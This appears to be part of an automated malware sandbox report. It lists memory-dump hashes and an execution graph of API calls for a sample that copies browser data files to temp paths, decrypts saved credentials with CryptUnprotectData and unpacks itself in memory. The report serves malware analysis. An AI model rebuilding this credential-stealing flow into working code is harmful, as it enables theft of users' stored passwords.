                                                        • Source File: 0000000F.00000002.625412697.0000000002801000.00000020.80000000.00040000.00000000.sdmp, Offset: 02801000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_2801000_explorer.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AcquireContextCryptInformationVolume
                                                        • String ID:
                                                        • API String ID: 4059528372-0
                                                        • Opcode ID: 6360c7cb42068f0464419020233b993fd04aec100295d9fc2771373569cbd1ae
                                                        • Instruction ID: 5ff07bd752fa8db797625aba05fd4c3e9b54ddc78cee21879b665b228ec3de38
                                                        • Opcode Fuzzy Hash: 6360c7cb42068f0464419020233b993fd04aec100295d9fc2771373569cbd1ae
                                                        • Instruction Fuzzy Hash: 2D318E34618B4C8FD794EF2CC84879977E2FB98311F50062E984ED7264DE34D9458B82
                                                        APIs
                                                          • Part of subcall function 028019D0: RtlCreateHeap.NTDLL ref: 02801AE7
                                                        • SleepEx.KERNEL32(?,?,?,?,?,?,?,02801973), ref: 028019A0
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.625412697.0000000002801000.00000020.80000000.00040000.00000000.sdmp, Offset: 02801000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_2801000_explorer.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateHeapSleep
                                                        • String ID:
                                                        • API String ID: 221814145-0
                                                        • Opcode ID: 9adc8d4cde1f516ddaa5c4750073014e5650bc8f10d33b0d75f43d3a0b67238f
                                                        • Instruction ID: 34d133c5690be3e00550cd96fe64d10bedd82614cf9b53e792362d9b8a5fd0e1
                                                        • Opcode Fuzzy Hash: 9adc8d4cde1f516ddaa5c4750073014e5650bc8f10d33b0d75f43d3a0b67238f
                                                        • Instruction Fuzzy Hash: BFE0481CB14A084BDBD4B77D9CCC33C61A1DBC8365F941579691DC61C5D924C8408723
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.501192632.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_260000_dagifhd.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 8!p
                                                        • API String ID: 0-2808226621
                                                        • Opcode ID: 03fdcee96880410df66dc40d9c15e8fcbdc7b9ac075f234a80b0d17ff23cee9c
                                                        • Instruction ID: 63ad6c61d641b577ac7d09d610fa2329a84531a6db8a500efa5e0438fac0b856
                                                        • Opcode Fuzzy Hash: 03fdcee96880410df66dc40d9c15e8fcbdc7b9ac075f234a80b0d17ff23cee9c
                                                        • Instruction Fuzzy Hash: AE1189766006049FD342BB78E810B697BE9DFCAB10F0504AAE4118F362DA61AC02CBA1
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.501192632.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_260000_dagifhd.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f8f73f86c43eb1476b52dd076673881944c00848d9a51be33c387f75f7f9b400
                                                        • Instruction ID: a09d2e0ac1950852939007661d3de75360b00235017ebb55897250414b5c624b
                                                        • Opcode Fuzzy Hash: f8f73f86c43eb1476b52dd076673881944c00848d9a51be33c387f75f7f9b400
                                                        • Instruction Fuzzy Hash: 6702D5307006159FCB14EF64C894A6EBBF2FFC5300B188969E515AB395DB71ED92CB90
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.501192632.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_260000_dagifhd.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 95860eca59caff9cb29f309a664b40ec138ae61a967c4dc3247932ca2a73c5e4
                                                        • Instruction ID: 57bf1dd16ce71cd9eb6c86f5b4f22d90b7c29e7c0919fe5b86023f47b9e87f7d
                                                        • Opcode Fuzzy Hash: 95860eca59caff9cb29f309a664b40ec138ae61a967c4dc3247932ca2a73c5e4
                                                        • Instruction Fuzzy Hash: D0D18234210602CFD705EF34D884B6A7BE2FF89304F648869D8169B365DBB1ED91EB90
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.501192632.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_260000_dagifhd.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 936651086b7b14869f5642650070cdfb68c6f56c20624b74c07b25d9b4bff384
                                                        • Instruction ID: 590dced887dd47a56fe620d16c5a8719365d96747a00421d8768d362f1cebbd5
                                                        • Opcode Fuzzy Hash: 936651086b7b14869f5642650070cdfb68c6f56c20624b74c07b25d9b4bff384
                                                        • Instruction Fuzzy Hash: C2818130A1064ADFCB14DF64C8809AEBBF2FF89304F288569E555AB251D771ED92CB90
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.501192632.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_260000_dagifhd.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a2fbea9c1770c4a6c976683eeb1d56ff79f587b9dde0e2586b7a46299639459b
                                                        • Instruction ID: e2740040cc7df4900493f1a891a4262ad5b19a2e72e14d7053a23f7e8a35183d
                                                        • Opcode Fuzzy Hash: a2fbea9c1770c4a6c976683eeb1d56ff79f587b9dde0e2586b7a46299639459b
                                                        • Instruction Fuzzy Hash: 6C210C343016108FC749EF38C4A992D7BE2AF8A71532548A9F406CF3B2DA75EC42CB91
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.501192632.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_260000_dagifhd.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9c7e2b4a6bce56e414e465ba0fb893e9267c2ceb3192414f5b99a27f409e998a
                                                        • Instruction ID: 670748d2d93af561244c6ed4f92f9f555622c4d875bdc355fc6f74ca6b0cb431
                                                        • Opcode Fuzzy Hash: 9c7e2b4a6bce56e414e465ba0fb893e9267c2ceb3192414f5b99a27f409e998a
                                                        • Instruction Fuzzy Hash: 8011C431B001049FC705ABB4D85579D7BE6DF89700F0481BAE609AB354DE35AD068BA1
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.501192632.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_260000_dagifhd.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8b89107c5335178deebbbba09300a96257e2f4137a6ef1e084956c776f89365e
                                                        • Instruction ID: f77098c5dc336f3a42ff35053f7e9d66558aac73eee30c59db18be6c2cdadec0
                                                        • Opcode Fuzzy Hash: 8b89107c5335178deebbbba09300a96257e2f4137a6ef1e084956c776f89365e
                                                        • Instruction Fuzzy Hash: D3012B727006109FC3219F35E848D1E3FE4EB89B5031505A5F8429F354DA71EC618BA1
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.501192632.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_260000_dagifhd.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bef05b50e6c75618e670a8f6ad5ca059f6477b82d233a8678b9703d511800f31
                                                        • Instruction ID: 756e59f71e34e5ab1c8c9e4f36754862433665589fb021fd1bd114b8b0f0e81b
                                                        • Opcode Fuzzy Hash: bef05b50e6c75618e670a8f6ad5ca059f6477b82d233a8678b9703d511800f31
                                                        • Instruction Fuzzy Hash: F8F024727053101FD3092A395C546AF7BAAEFC6510308047BE419C7392DD749D0283E0
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.501192632.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_260000_dagifhd.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5612b41ed4593b53605564bcf1b6ef6538236e060113244ec324234c67454251
                                                        • Instruction ID: 7ce573aaf15f2c7af62e2d2b17cbeeaae4251b686d568f2b8be50041dadbf42c
                                                        • Opcode Fuzzy Hash: 5612b41ed4593b53605564bcf1b6ef6538236e060113244ec324234c67454251
                                                        • Instruction Fuzzy Hash: C0F09B35A0C34DAFC706DFF998585DA7FF9EF4A11071440EBE048D7151F63058459761
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.501192632.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_260000_dagifhd.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ee90235137d1624c0603975856941754a75bd3890717ac3aa42819c3fa4f131c
                                                        • Instruction ID: 63bbb7cfd1380897c2d75c227b34dcb480954c10f780146edbb3a0c7660300aa
                                                        • Opcode Fuzzy Hash: ee90235137d1624c0603975856941754a75bd3890717ac3aa42819c3fa4f131c
                                                        • Instruction Fuzzy Hash: 5AE01276A0411DAF8B04EFF9E8489DEBFEDFB48262B108467E009D3610FB7559828794
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.501192632.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_260000_dagifhd.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c790925b8f732806289b3bda6150282d79e0d704636f70fd0ac3292f0b55697d
                                                        • Instruction ID: 81aead21917840096ebea07833b94a132fa6863ea8313055a3606e8df300cfe7
                                                        • Opcode Fuzzy Hash: c790925b8f732806289b3bda6150282d79e0d704636f70fd0ac3292f0b55697d
                                                        • Instruction Fuzzy Hash: 97E0C2341097809FC706AF34ED24AB03FE5AB46300B4504E5E481AF2A6D6B06C80DB59
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.501192632.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_260000_dagifhd.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d9c6b16b9b932f53ced3f87651e984df0d701787da2623680adf60c441f3bab8
                                                        • Instruction ID: affb8d9f9c5f510a9e6da33cbb84e6a8728ac4828f727dfd52943de63fbbfda0
                                                        • Opcode Fuzzy Hash: d9c6b16b9b932f53ced3f87651e984df0d701787da2623680adf60c441f3bab8
                                                        • Instruction Fuzzy Hash: 97D0A733A0DA555BCB0296B56C153CC3F248B12254B4C00BBD444D7192E644992483D2
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.501192632.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_260000_dagifhd.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 450f138c7979d38efc46dea26450d1a6428ad259c7d71e289f82d63ae755c0bd
                                                        • Instruction ID: 43cefaed4142d96c65406b2f55dd056ffebc88f0935b141c573a1599154c0def
                                                        • Opcode Fuzzy Hash: 450f138c7979d38efc46dea26450d1a6428ad259c7d71e289f82d63ae755c0bd
                                                        • Instruction Fuzzy Hash: D6C08CA849E2C42FEB032B302C387503F700F8B604F8920DAD081470F3D55C04A9C33A

                                                        Execution Graph

                                                        Execution Coverage:2.5%
                                                        Dynamic/Decrypted Code Coverage:53.3%
                                                        Signature Coverage:16.2%
                                                        Total number of Nodes:587
                                                        Total number of Limit Nodes:30
                                                        execution_graph 27726 ca40e 27731 ca426 27726->27731 27735 ca4a2 27726->27735 27727 ca4cc ReadFile 27729 ca524 27727->27729 27727->27735 27728 ca469 memcpy 27728->27735 27740 ca2aa 17 API calls 27729->27740 27730 ca44a memcpy 27738 ca45d 27730->27738 27731->27728 27731->27730 27731->27735 27733 ca532 27734 ca53e memset 27733->27734 27733->27738 27734->27738 27735->27727 27735->27729 27736 ca501 27735->27736 27739 ca1c6 18 API calls 27736->27739 27739->27738 27740->27733 28441 e0e0c 22 API calls 27955 c4406 27960 c2e30 StrStrIW 27955->27960 27958 c2e30 22 API calls 27959 c443a 27958->27959 27961 c2ebc 27960->27961 27962 c2e57 27960->27962 27986 c1000 GetProcessHeap RtlAllocateHeap 27961->27986 27964 c19e5 9 API calls 27962->27964 27966 c2e68 27964->27966 27965 c2ed0 RegOpenKeyExW 27967 c2f68 27965->27967 27977 c2eee 27965->27977 27966->27961 27987 c1bc5 10 API calls 27966->27987 27970 c1011 3 API calls 27967->27970 27969 c2f50 RegEnumKeyExW 27973 c2f5e RegCloseKey 27969->27973 27969->27977 27971 c2f6f 27970->27971 27971->27958 27972 c2e75 27974 c2eb5 27972->27974 27976 c1afe 10 API calls 27972->27976 27973->27967 27978 c1011 3 API calls 27974->27978 27975 c1953 6 API calls 27975->27977 27979 c2e83 27976->27979 27977->27969 27977->27975 27980 c199d 9 API calls 27977->27980 27982 c2e30 18 API calls 27977->27982 27985 c1011 3 API calls 27977->27985 27978->27961 27981 c199d 9 API calls 27979->27981 27984 c2e91 27979->27984 27980->27977 27981->27984 27982->27977 27983 c1011 3 API calls 27983->27974 27984->27983 27985->27977 27986->27965 27987->27972 28443 cca01 _allmul _alldiv _allmul _alldiv 28335 f9000 28 API calls 28337 105401 memset memcpy memcpy memset memcpy 28445 ef21c 23 API calls 28338 c581f _alldiv _allrem _allmul 28340 e742e 25 API calls 28342 e7c28 8 API calls 28344 c482b 14 API calls 28345 fe024 84 API calls 28347 d943d 35 API calls 28350 107452 19 API calls 28452 e13ca 93 API calls 27993 c3c40 27994 c1b6a 2 API calls 27993->27994 27995 c3c50 27994->27995 27996 c3dfa 27995->27996 28029 c1000 GetProcessHeap RtlAllocateHeap 27995->28029 27998 c3c62 GetTempPathW GetTempFileNameW DeleteFileW CopyFileW 28030 114bec 27998->28030 28000 c3dec DeleteFileW 28001 c1011 3 API calls 28000->28001 28001->27996 28002 c3c9a 28002->28000 28003 c3de3 28002->28003 28041 c1000 GetProcessHeap RtlAllocateHeap 28002->28041 28049 113848 67 API calls 28003->28049 28006 c3cce 28042 e02ec 85 API calls 28006->28042 28008 c3da8 28045 dfb92 84 API calls 28008->28045 28010 c3db1 lstrlen 28011 c3ddc 28010->28011 28012 c3db9 28010->28012 28015 c1011 3 API calls 28011->28015 28046 c1798 lstrlen 28012->28046 28013 c1fa7 19 API calls 28022 c3cd9 28013->28022 28015->28003 28016 c3dc8 28047 c1798 lstrlen 28016->28047 28017 c3d2b lstrlen 28019 c3d35 lstrlen 28017->28019 28017->28022 28019->28022 28020 c3dd2 28048 c1798 lstrlen 28020->28048 28022->28008 28022->28013 28022->28017 28043 c1000 GetProcessHeap RtlAllocateHeap 28022->28043 28044 e02ec 85 API calls 28022->28044 28025 c3d46 wsprintfA lstrlen 28026 c3d71 28025->28026 28027 c3d83 lstrcat 28025->28027 28026->28027 28028 c1011 3 API calls 28027->28028 28028->28022 28029->27998 28050 11307c 28030->28050 28032 114c01 28040 114c44 28032->28040 28060 dc54d memset 28032->28060 28034 114c18 28061 dc871 21 API calls 28034->28061 28036 114c2a 28062 dc518 19 API calls 28036->28062 28038 114c33 28038->28040 28063 11486f 80 API calls 28038->28063 28040->28002 28041->28006 28042->28022 28043->28025 28044->28022 28045->28010 28046->28016 28047->28020 28048->28011 28049->28000 28051 113095 28050->28051 28059 11308e 28050->28059 28052 1130ad 28051->28052 28077 c66ce 17 API calls 28051->28077 28054 1130ed memset 28052->28054 28052->28059 28055 113108 28054->28055 28056 113116 28055->28056 28078 cc59d 17 API calls 28055->28078 28056->28059 28064 c6512 28056->28064 28059->28032 28060->28034 28061->28036 28062->28038 28063->28040 28079 c685c 28064->28079 28066 c651d 28066->28059 28067 c6519 28067->28066 28068 cbfec GetSystemInfo 28067->28068 28082 c65bd 28068->28082 28070 cc00e 28071 c65bd 16 API calls 28070->28071 28072 cc01a 28071->28072 28073 c65bd 16 API calls 28072->28073 28074 cc026 28073->28074 28075 c65bd 16 API calls 28074->28075 28076 cc032 28075->28076 28076->28059 28077->28052 28078->28056 28080 11307c 17 API calls 28079->28080 28081 c6861 28080->28081 28081->28067 28083 11307c 17 API calls 28082->28083 28084 c65c2 28083->28084 28084->28070 28352 c4440 24 API calls 28353 e6440 85 API calls 28085 c105d VirtualFree 28456 129238 LoadLibraryA GetProcAddress VirtualProtect VirtualProtect 28457 c5e5a 28 API calls 28355 c4c6d 17 API calls 28459 f3e6b 20 API calls 28357 df86a 32 API calls 28358 11507d 24 API calls 28360 d807c 23 API calls 28362 102864 25 API calls 28463 e0670 _allmul _allmul _allmul _alldvrm 28466 d0284 26 API calls 28368 102c9e 96 API calls 28469 e069d _allmul 28168 c3098 28169 c1b6a 2 API calls 28168->28169 28170 c30af 28169->28170 28176 c33a9 28170->28176 28192 c1000 GetProcessHeap RtlAllocateHeap 28170->28192 28172 c30ed GetTempPathW GetTempFileNameW DeleteFileW CopyFileW 28173 114bec 80 API calls 28172->28173 28177 c3126 28173->28177 28174 c339b DeleteFileW 28175 c1011 3 API calls 28174->28175 28175->28176 28177->28174 28178 c3392 28177->28178 28193 e02ec 85 API calls 28177->28193 28197 113848 67 API calls 28178->28197 28181 c3381 28196 dfb92 84 API calls 28181->28196 28183 c319c RtlCompareMemory 28184 c32cd CryptUnprotectData 28183->28184 28191 c3155 28183->28191 28184->28191 28186 c31d0 RtlZeroMemory 28194 c1000 GetProcessHeap RtlAllocateHeap 28186->28194 28188 c1011 3 API calls 28188->28191 28189 c1fa7 19 API calls 28189->28191 28190 c1798 lstrlen 28190->28191 28191->28181 28191->28183 28191->28184 28191->28186 28191->28188 28191->28189 28191->28190 28195 e02ec 85 API calls 28191->28195 28192->28172 28193->28191 28194->28191 28195->28191 28196->28178 28197->28174 28470 d6698 31 API calls 28471 c629a 23 API calls 28374 10348f 27 API calls 28376 db0aa 75 API calls 27934 c24a4 27937 c2198 RtlZeroMemory GetVersionExW 27934->27937 27938 c21cb LoadLibraryW 27937->27938 27940 c21fc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27938->27940 27941 c249b 27938->27941 27942 c2492 FreeLibrary 27940->27942 27950 c2244 27940->27950 27942->27941 27943 c247b 27943->27942 27944 c2365 RtlCompareMemory 27944->27950 27945 c22e1 RtlCompareMemory 27945->27950 27946 c1953 6 API calls 27946->27950 27947 c1011 GetProcessHeap HeapFree VirtualQuery 27947->27950 27948 c23f8 StrStrIW 27948->27950 27949 c17c0 9 API calls 27949->27950 27950->27942 27950->27943 27950->27944 27950->27945 27950->27946 27950->27947 27950->27948 27950->27949 27954 c2ea5 25 API calls 27988 c9ea7 RtlAllocateHeap 27989 c9ed9 27988->27989 27990 c9ec1 27988->27990 27992 c7f70 17 API calls 27990->27992 27992->27989 28377 db8a6 81 API calls 28475 c56a2 _allrem 28476 c96bc _alldiv _alldiv _alldiv _alldiv _allmul 28378 d78b9 34 API calls 28478 e12bb _allmul _allmul _allmul _alldvrm _allmul 28379 e13ca 78 API calls 28480 e13ca 80 API calls 28380 c2cb5 16 API calls 28381 c6eb7 24 API calls 28382 c48b1 22 API calls 28482 efaca _allmul strcspn 28384 c6eb7 22 API calls 28385 d5cca 33 API calls 28386 c5cc5 22 API calls 28387 f70de 24 API calls 28487 ec6da 23 API calls 28391 1134ca 48 API calls 28394 cf4ec 20 API calls 27921 c9ee8 27922 c9ef1 HeapFree 27921->27922 27925 c9f1a 27921->27925 27923 c9f02 27922->27923 27922->27925 27926 c7f70 17 API calls 27923->27926 27926->27925 28396 c28f8 101 API calls 28491 e13ca 79 API calls 28397 c4cf5 memset 28492 f9ef6 105 API calls 28398 e13ca 80 API calls 27741 c4108 27744 c4045 27741->27744 27763 c3fdc 27744->27763 27747 c3fdc 50 API calls 27748 c407a 27747->27748 27749 c3fdc 50 API calls 27748->27749 27750 c408d 27749->27750 27751 c3fdc 50 API calls 27750->27751 27752 c40a0 27751->27752 27753 c3fdc 50 API calls 27752->27753 27754 c40b3 27753->27754 27755 c3fdc 50 API calls 27754->27755 27756 c40c6 27755->27756 27757 c3fdc 50 API calls 27756->27757 27758 c40d9 27757->27758 27759 c3fdc 50 API calls 27758->27759 27760 c40ec 27759->27760 27761 c3fdc 50 API calls 27760->27761 27762 c40ff 27761->27762 27774 c1afe 27763->27774 27766 c403f 27766->27747 27771 c4038 27837 c1011 27771->27837 27842 c1000 GetProcessHeap RtlAllocateHeap 27774->27842 27776 c1b0d SHGetFolderPathW 27777 c1b63 27776->27777 27778 c1b20 27776->27778 27777->27766 27782 c199d 27777->27782 27779 c1011 3 API calls 27778->27779 27781 c1b28 27779->27781 27781->27777 27843 c19e5 27781->27843 27858 c1953 27782->27858 27784 c19a6 27785 c1011 3 API calls 27784->27785 27786 c19af 27785->27786 27787 c3ed9 27786->27787 27788 c3eed 27787->27788 27789 c3fd1 27787->27789 27788->27789 27864 c1000 GetProcessHeap RtlAllocateHeap 27788->27864 27789->27771 27809 c1d4a 27789->27809 27791 c3f01 PathCombineW FindFirstFileW 27792 c3fca 27791->27792 27793 c3f27 27791->27793 27796 c1011 3 API calls 27792->27796 27794 c3f78 lstrcmpiW 27793->27794 27795 c3f32 lstrcmpiW 27793->27795 27865 c1000 GetProcessHeap RtlAllocateHeap 27793->27865 27794->27793 27797 c3faf FindNextFileW 27794->27797 27795->27797 27798 c3f42 lstrcmpiW 27795->27798 27796->27789 27797->27793 27800 c3fc3 FindClose 27797->27800 27798->27797 27801 c3f56 27798->27801 27800->27792 27882 c1000 GetProcessHeap RtlAllocateHeap 27801->27882 27802 c3f92 PathCombineW 27866 c3e04 27802->27866 27805 c3f60 PathCombineW 27807 c3ed9 23 API calls 27805->27807 27806 c3f76 27808 c1011 3 API calls 27806->27808 27807->27806 27808->27797 27810 c1eb4 27809->27810 27811 c1d62 27809->27811 27810->27771 27811->27810 27914 c19b4 27811->27914 27814 c1d79 27816 c1953 6 API calls 27814->27816 27815 c1d8b 27817 c1953 6 API calls 27815->27817 27818 c1d83 27816->27818 27817->27818 27818->27810 27819 c1da3 FindFirstFileW 27818->27819 27820 c1ead 27819->27820 27827 c1dba 27819->27827 27821 c1011 3 API calls 27820->27821 27821->27810 27822 c1dc5 lstrcmpiW 27824 c1ddd lstrcmpiW 27822->27824 27825 c1e8e FindNextFileW 27822->27825 27823 c1953 6 API calls 27823->27827 27824->27825 27834 c1df5 27824->27834 27826 c1ea2 FindClose 27825->27826 27825->27827 27826->27820 27827->27822 27827->27823 27828 c199d 9 API calls 27827->27828 27830 c1e54 lstrcmpiW 27828->27830 27829 c19b4 lstrlenW 27829->27834 27830->27834 27831 c1011 3 API calls 27831->27825 27833 c1953 6 API calls 27833->27834 27834->27829 27834->27831 27834->27833 27835 c199d 9 API calls 27834->27835 27836 c1d4a 12 API calls 27834->27836 27918 c1cf7 GetProcessHeap RtlAllocateHeap lstrlenW RtlComputeCrc32 27834->27918 27835->27834 27836->27834 27919 c1162 VirtualQuery 27837->27919 27840 c102d 27840->27766 27841 c101d GetProcessHeap HeapFree 27841->27840 27842->27776 27844 c19fa RegOpenKeyExW 27843->27844 27845 c19f7 27843->27845 27846 c1a28 RegQueryValueExW 27844->27846 27847 c1aa2 27844->27847 27845->27844 27849 c1a94 RegCloseKey 27846->27849 27850 c1a46 27846->27850 27848 c1ab9 27847->27848 27851 c19e5 5 API calls 27847->27851 27848->27781 27849->27847 27849->27848 27850->27849 27857 c1000 GetProcessHeap RtlAllocateHeap 27850->27857 27851->27848 27853 c1a61 RegQueryValueExW 27854 c1a7f 27853->27854 27855 c1a8b 27853->27855 27854->27849 27856 c1011 3 API calls 27855->27856 27856->27854 27857->27853 27859 c1964 lstrlenW lstrlenW 27858->27859 27863 c1000 GetProcessHeap RtlAllocateHeap 27859->27863 27862 c1986 lstrcatW lstrcatW 27862->27784 27863->27862 27864->27791 27865->27802 27883 c1b6a 27866->27883 27868 c3e0f 27873 c3ec7 27868->27873 27889 c1c31 CreateFileW 27868->27889 27873->27806 27876 c3ebf 27877 c1011 3 API calls 27876->27877 27877->27873 27878 c3e6c RtlCompareMemory 27879 c3ea8 27878->27879 27880 c3e7e CryptUnprotectData 27878->27880 27881 c1011 3 API calls 27879->27881 27880->27879 27881->27876 27882->27805 27884 c1b6f 27883->27884 27885 c1b99 27883->27885 27884->27885 27886 c1b76 CreateFileW 27884->27886 27885->27868 27887 c1b8d CloseHandle 27886->27887 27888 c1b95 27886->27888 27887->27888 27888->27868 27890 c1c98 27889->27890 27891 c1c53 GetFileSize 27889->27891 27890->27873 27899 c2fb1 27890->27899 27892 c1c90 CloseHandle 27891->27892 27893 c1c63 27891->27893 27892->27890 27911 c1000 GetProcessHeap RtlAllocateHeap 27893->27911 27895 c1c6b ReadFile 27896 c1c80 27895->27896 27896->27892 27897 c1011 3 API calls 27896->27897 27898 c1c8e 27897->27898 27898->27892 27900 c2fb8 StrStrIA 27899->27900 27902 c2ff2 27899->27902 27901 c2fcd lstrlen StrStrIA 27900->27901 27900->27902 27901->27902 27903 c2fe7 27901->27903 27902->27873 27905 c123b lstrlen 27902->27905 27912 c190b 6 API calls 27903->27912 27906 c129b 27905->27906 27907 c1256 CryptStringToBinaryA 27905->27907 27906->27876 27906->27878 27906->27879 27907->27906 27908 c1272 27907->27908 27913 c1000 GetProcessHeap RtlAllocateHeap 27908->27913 27910 c127e CryptStringToBinaryA 27910->27906 27911->27895 27912->27902 27913->27910 27915 c19bc 27914->27915 27917 c19d4 27914->27917 27916 c19c3 lstrlenW 27915->27916 27915->27917 27916->27917 27917->27814 27917->27815 27918->27834 27920 c1019 27919->27920 27920->27840 27920->27841 28494 e5f08 93 API calls 28400 114116 30 API calls 28496 f6f06 24 API calls 28401 d84a7 31 API calls 28228 129304 28230 129344 28228->28230 28229 129584 28229->28229 28230->28229 28231 1294da LoadLibraryA 28230->28231 28235 12951f VirtualProtect VirtualProtect 28230->28235 28232 1294f1 28231->28232 28232->28230 28234 129503 GetProcAddress 28232->28234 28234->28232 28236 129519 28234->28236 28235->28229 28253 c411b 28254 c4045 50 API calls 28253->28254 28255 c412b 28254->28255 28256 c4045 50 API calls 28255->28256 28257 c413b 28256->28257 28500 c2b15 50 API calls 28501 e6b14 memset memcpy _allmul 28261 c3717 28262 c1b6a 2 API calls 28261->28262 28263 c372e 28262->28263 28264 c3c23 28263->28264 28311 c1000 GetProcessHeap RtlAllocateHeap 28263->28311 28266 c376c GetTempPathW GetTempFileNameW DeleteFileW CopyFileW 28267 c379e 28266->28267 28268 c37a8 28266->28268 28312 c349b 31 API calls 28267->28312 28270 114bec 80 API calls 28268->28270 28273 c37b3 28270->28273 28271 c3c15 DeleteFileW 28272 c1011 3 API calls 28271->28272 28272->28264 28273->28271 28274 c3c0c 28273->28274 28313 c1000 GetProcessHeap RtlAllocateHeap 28273->28313 28323 113848 67 API calls 28274->28323 28277 c37e3 28314 e02ec 85 API calls 28277->28314 28279 c3bcc 28319 dfb92 84 API calls 28279->28319 28281 c3bd9 lstrlen 28283 c3c05 28281->28283 28284 c3be5 28281->28284 28282 c1fa7 19 API calls 28305 c37ee 28282->28305 28286 c1011 3 API calls 28283->28286 28320 c1798 lstrlen 28284->28320 28286->28274 28288 c3bf3 28321 c1798 lstrlen 28288->28321 28289 c3a37 CryptUnprotectData 28289->28305 28290 c3833 RtlCompareMemory 28290->28289 28290->28305 28292 c3bfc 28322 c1798 lstrlen 28292->28322 28294 c3867 RtlZeroMemory 28315 c1000 GetProcessHeap RtlAllocateHeap 28294->28315 28296 c1011 3 API calls 28296->28305 28297 c3b0f lstrlen 28298 c3b21 lstrlen 28297->28298 28297->28305 28298->28305 28299 c1000 GetProcessHeap RtlAllocateHeap 28299->28305 28300 c3987 lstrlen 28303 c3999 lstrlen 28300->28303 28300->28305 28302 c3b66 wsprintfA lstrlen 28304 c3ba3 lstrcat 28302->28304 28302->28305 28303->28305 28304->28305 28305->28279 28305->28282 28305->28289 28305->28290 28305->28294 28305->28296 28305->28297 28305->28299 28305->28300 28305->28304 28316 c2112 GetProcessHeap RtlAllocateHeap GetSystemTimeAsFileTime _alldiv wsprintfA 28305->28316 28317 c2112 GetProcessHeap RtlAllocateHeap GetSystemTimeAsFileTime _alldiv wsprintfA 28305->28317 28318 e02ec 85 API calls 28305->28318 28307 c39de wsprintfA lstrlen 28308 c3a1b lstrcat 28307->28308 28309 c3a0d 28307->28309 28310 c1011 3 API calls 28308->28310 28309->28308 28310->28305 28311->28266 28312->28268 28313->28277 28314->28305 28315->28305 28316->28307 